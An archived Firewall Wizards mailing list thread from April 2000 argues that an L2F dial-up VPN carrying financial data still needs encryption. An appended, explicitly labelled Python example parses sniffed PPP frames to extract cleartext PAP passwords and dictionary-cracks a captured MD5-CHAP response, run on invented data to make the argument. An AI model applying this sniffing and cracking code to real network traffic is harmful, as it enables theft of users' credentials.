Firewall Wizards mailing list archives
Re: Question about L2F tunnels
From: Aaron Turner <aturner () vicinity com>
Date: Thu, 20 Apr 2000 13:39:01 -0700 (PDT)
I had a co-worker that once worked at a high-tech company here in the Silicon Valley (gee, that narrows it a bit now, don't it). He got a call from the FBI one day. Turns out someone had broken into a POP for an X.25 dialup and installed a sniffer. Apparently this setup had sniffed tens of thousands of username/passwords from hundreds of high-tech companies. The agent suggested that my co-worker force everyone to change their passwords ASAP.

Also, what prevents someone from accidentally misconfiguring your "tunnel" so that the packets go to the wrong place? Oh, let me guess: all their employees are super-humans who make no mistakes. :) I've seen this happen once with MCI and a frame-relay connection of mine. I have no idea if it's exploitable, but it doesn't give me the warm fuzzies.

I just had a discussion at our monthly BAFUG meeting. We all agreed that while many vendors would like you to believe that a VPN does not *require* encryption, none of us would be willing to accept the risks. We all wanted strong authentication (certificates or two-factor) and content encryption. YMMV.

--
Aaron Turner aturner () vicinity com 650.237.0300 x252
Security Engineer, Vicinity Corp. Cell: 408-314-9874
http://www.vicinity.com

On Wed, 19 Apr 2000, Michele M. Jordan wrote:
Okay, I had a major provider who is doing Access VPNs tell a customer this: It is their statement that encryption is not necessary since it is not leaving the <provider's> network. The tunnel will provide the necessary security is their position. I then asked her, if security wasn't necessary, then why do we need the tunnel? She said to that: "Well, the tunnel provides the necessary security, so encryption isn't necessary since it is going from router to router and that's the only connection that is possible."

This is financial data via a dial-up to a provider POP; the provider forwards an L2F tunnel request to my customer, my customer accepts the tunnel request, authenticates via remote RADIUS, and then initiates the tunnel. If we did do encryption, it would need to be from the provider POP to my customer's router.

I think encryption is necessary; what do you think?

-Michele
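An added example, not part of either message in the thread, of what a sniffer placed at the provider POP (as in the FBI story above) actually harvests when the L2F tunnel carries PPP without any content encryption. L2F only encapsulates the dial-up user's PPP frames; it does nothing to hide them. The code builds constructed PPP authentication frames (RFC 1334 PAP and RFC 1994 MD5-CHAP), parses them the way a passive sniffer would, and shows that PAP credentials are readable verbatim while a CHAP challenge/response pair can be run through a dictionary offline. The L2F/UDP header is assumed to have been stripped already; the usernames, passwords, challenge bytes and wordlist are all made up for the example.

```python
import hashlib
import struct

# PPP framing constants (RFC 1661) and the two authentication protocols
# a dial-up user is normally offered (RFC 1334 PAP, RFC 1994 CHAP).
PPP_ADDRESS, PPP_CONTROL = 0xFF, 0x03
PROTO_PAP, PROTO_CHAP = 0xC023, 0xC223
PAP_AUTH_REQUEST, CHAP_CHALLENGE, CHAP_RESPONSE = 1, 1, 2


def ppp_frame(proto, code, ident, body):
    """Wrap an authentication PDU in a PPP frame: HDLC address/control,
    2-byte protocol field, then code/identifier/length per RFC 1334/1994."""
    return (bytes([PPP_ADDRESS, PPP_CONTROL]) + struct.pack(">H", proto)
            + struct.pack(">BBH", code, ident, 4 + len(body)) + body)


def pap_request(ident, user, password):
    """PAP Authenticate-Request: the password travels in the clear."""
    return ppp_frame(PROTO_PAP, PAP_AUTH_REQUEST, ident,
                     bytes([len(user)]) + user + bytes([len(password)]) + password)


def chap_value(ident, secret, challenge):
    """MD5-CHAP response value: MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


def chap_packet(code, ident, value, name):
    """CHAP Challenge or Response: Value-Size, Value, Name."""
    return ppp_frame(PROTO_CHAP, code, ident, bytes([len(value)]) + value + name)


def sample_capture():
    """Constructed frames standing in for what a sniffer at the POP sees
    inside the L2F tunnel (L2F/UDP encapsulation assumed already stripped).
    Names, secrets and the challenge are invented for this example."""
    challenge = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
    return [
        pap_request(3, b"alice", b"s3cret"),
        chap_packet(CHAP_CHALLENGE, 7, challenge, b"customer-router"),
        chap_packet(CHAP_RESPONSE, 7, chap_value(7, b"letmein", challenge), b"bob"),
    ]


def parse_ppp(frame):
    """Split a PPP frame into (protocol, code, identifier, PDU body)."""
    if frame[:2] != bytes([PPP_ADDRESS, PPP_CONTROL]):
        raise ValueError("not a PPP frame")
    proto = struct.unpack(">H", frame[2:4])[0]
    code, ident, length = struct.unpack(">BBH", frame[4:8])
    return proto, code, ident, frame[8:4 + length]


def sniff(frames):
    """Passive view of the tunnel: returns (cleartext PAP credentials,
    CHAP exchanges keyed by identifier)."""
    pap, chap = [], {}
    for frame in frames:
        proto, code, ident, body = parse_ppp(frame)
        if proto == PROTO_PAP and code == PAP_AUTH_REQUEST:
            ulen = body[0]
            user = body[1:1 + ulen]
            plen = body[1 + ulen]
            password = body[2 + ulen:2 + ulen + plen]
            pap.append((user.decode(), password.decode()))
        elif proto == PROTO_CHAP and code in (CHAP_CHALLENGE, CHAP_RESPONSE):
            vlen = body[0]
            value, name = body[1:1 + vlen], body[1 + vlen:]
            entry = chap.setdefault(ident, {"ident": ident})
            if code == CHAP_CHALLENGE:
                entry["challenge"] = value
            else:
                entry["response"], entry["name"] = value, name.decode()
    return pap, chap


def crack_chap(entry, wordlist):
    """Offline dictionary attack on a captured CHAP challenge/response pair;
    returns the recovered secret or None."""
    for guess in wordlist:
        if chap_value(entry["ident"], guess, entry["challenge"]) == entry["response"]:
            return guess.decode()
    return None


if __name__ == "__main__":
    pap, chap = sniff(sample_capture())
    print("PAP credentials in the clear:", pap)
    print("CHAP user bob's password:", crack_chap(chap[7], [b"wrong", b"letmein"]))
```

The point the example makes is the one the thread is arguing: the tunnel endpoint authentication (RADIUS at the customer) protects the customer router from unauthorised tunnel requests, but it does nothing for the user's PPP credentials or the financial data that follow, because every byte between the POP and the customer router is still readable to anyone on that path. Encryption from the POP to the customer's router, or end-to-end from the client, is what removes that exposure.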
Current thread:
- Question about L2F tunnels Michele M. Jordan (Apr 20)
- Re: Question about L2F tunnels Aaron Turner (Apr 20)
- Re: Question about L2F tunnels Bill Pennington (Apr 21)